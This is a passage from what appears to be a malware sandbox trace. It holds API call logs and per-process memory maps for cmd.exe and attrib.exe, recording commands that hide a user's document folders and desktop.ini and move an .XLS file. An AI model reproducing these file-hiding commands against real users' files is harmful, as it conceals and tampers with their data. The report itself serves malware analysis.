\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af19c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" ", lpProcessInformation=0x2af19c*(hProcess=0x4c, hThread=0x50, dwProcessId=0x69c, dwThreadId=0x720)) returned 1 [0129.003] CloseHandle (hObject=0x50) returned 1 [0129.003] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.003] GetEnvironmentStringsW () returned 0x352ed0* [0129.003] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.003] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0129.115] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af090 | out: lpExitCode=0x2af090*=0x0) returned 1 [0129.115] CloseHandle (hObject=0x4c) returned 1 [0129.115] _vsnwprintf (in: _Buffer=0x2af1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af09c | out: _Buffer="00000000") returned 8 [0129.115] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.115] GetEnvironmentStringsW () returned 0x352ed0* [0129.115] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.115] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.115] GetEnvironmentStringsW () returned 0x352ed0* [0129.115] FreeEnvironmentStringsW (penv=0x352ed0) returned 1 [0129.115] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0f4 | out: lpAttributeList=0x2af0f4) [0129.115] GetConsoleTitleW (in: lpConsoleTitle=0x2af4d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.116] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0129.116] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0129.116] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.116] GetLastError () returned 0x2 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.116] GetLastError () returned 0x2 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x34e760 [0129.116] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0129.116] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0xffffffff [0129.117] GetLastError () returned 0x2 [0129.117] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aed74, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aed74) returned 0x34e760 [0129.117] FindClose (in: hFindFile=0x34e760 | out: hFindFile=0x34e760) returned 1 [0129.117] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0129.117] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0129.117] GetConsoleTitleW (in: lpConsoleTitle=0x2af26c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0129.117] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af0f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af1bc | out: lpAttributeList=0x2af0f4, lpSize=0x2af1bc) returned 1 [0129.117] UpdateProcThreadAttribute (in: lpAttributeList=0x2af0f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af1b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af0f4, lpPreviousValue=0x0) returned 1 [0129.117] GetStartupInfoW (in: lpStartupInfo=0x2af0b0 | out: lpStartupInfo=0x2af0b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0129.117] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0129.117] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af150*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af19c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"", lpProcessInformation=0x2af19c*(hProcess=0x50, hThread=0x4c, dwProcessId=0x510, dwThreadId=0x670)) returned 1 [0129.118] CloseHandle (hObject=0x4c) returned 1 [0129.118] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0129.118] GetEnvironmentStringsW () returned 0x353930* [0129.119] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.119] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0129.261] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af090 | out: lpExitCode=0x2af090*=0x0) returned 1 [0129.261] CloseHandle (hObject=0x50) returned 1 [0129.261] _vsnwprintf (in: _Buffer=0x2af1d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af09c | out: _Buffer="00000000") returned 8 [0129.261] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0129.261] GetEnvironmentStringsW () returned 0x353930* [0129.261] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.261] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0129.261] GetEnvironmentStringsW () returned 0x353930* [0129.261] FreeEnvironmentStringsW (penv=0x353930) returned 1 [0129.261] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af0f4 | out: lpAttributeList=0x2af0f4) [0129.261] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.261] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.261] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.261] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.261] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.261] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.262] SetConsoleInputExeNameW () returned 0x1 [0129.262] GetConsoleOutputCP () returned 0x1b5 [0129.262] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.262] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.262] exit (_Code=0) Process: id = "89" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16860" os_pid = "0x6bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10879 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10880 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10881 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10882 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 10883 start_va = 0x230000 end_va = 0x236fff entry_point = 0x230000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10884 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10885 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10886 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10887 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 10888 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10889 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10890 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10891 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10892 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10893 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 10894 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10895 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10896 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10897 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10898 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10899 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10900 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10901 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10902 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10903 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10904 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10905 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10906 start_va = 0x240000 end_va = 0x307fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 10907 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10908 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 146 os_tid = 0x514 Process: id = "90" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16680" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10933 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10934 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10935 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10936 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10937 start_va = 0x380000 end_va = 0x386fff entry_point = 0x380000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10938 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10939 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10940 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10941 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 10942 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10943 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10944 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10945 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10946 start_va = 0x1c0000 end_va = 0x226fff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10947 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10948 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10949 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10950 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10951 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10952 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10953 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10954 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10955 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10956 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10957 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10958 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10959 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10960 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10961 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10962 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 147 os_tid = 0x720 Process: id = "91" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16680" os_pid = "0x510" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11073 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11074 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11075 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11076 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 11077 start_va = 0xff0000 end_va = 0xff6fff entry_point = 0xff0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11078 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11079 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11080 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11081 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 11082 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11083 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11084 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11085 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11086 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 11087 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 11088 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11089 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11090 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11091 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11092 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11093 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11094 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11095 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11096 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11097 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11098 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11099 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11100 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 11101 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11102 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 148 os_tid = 0x670 Process: id = "92" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" 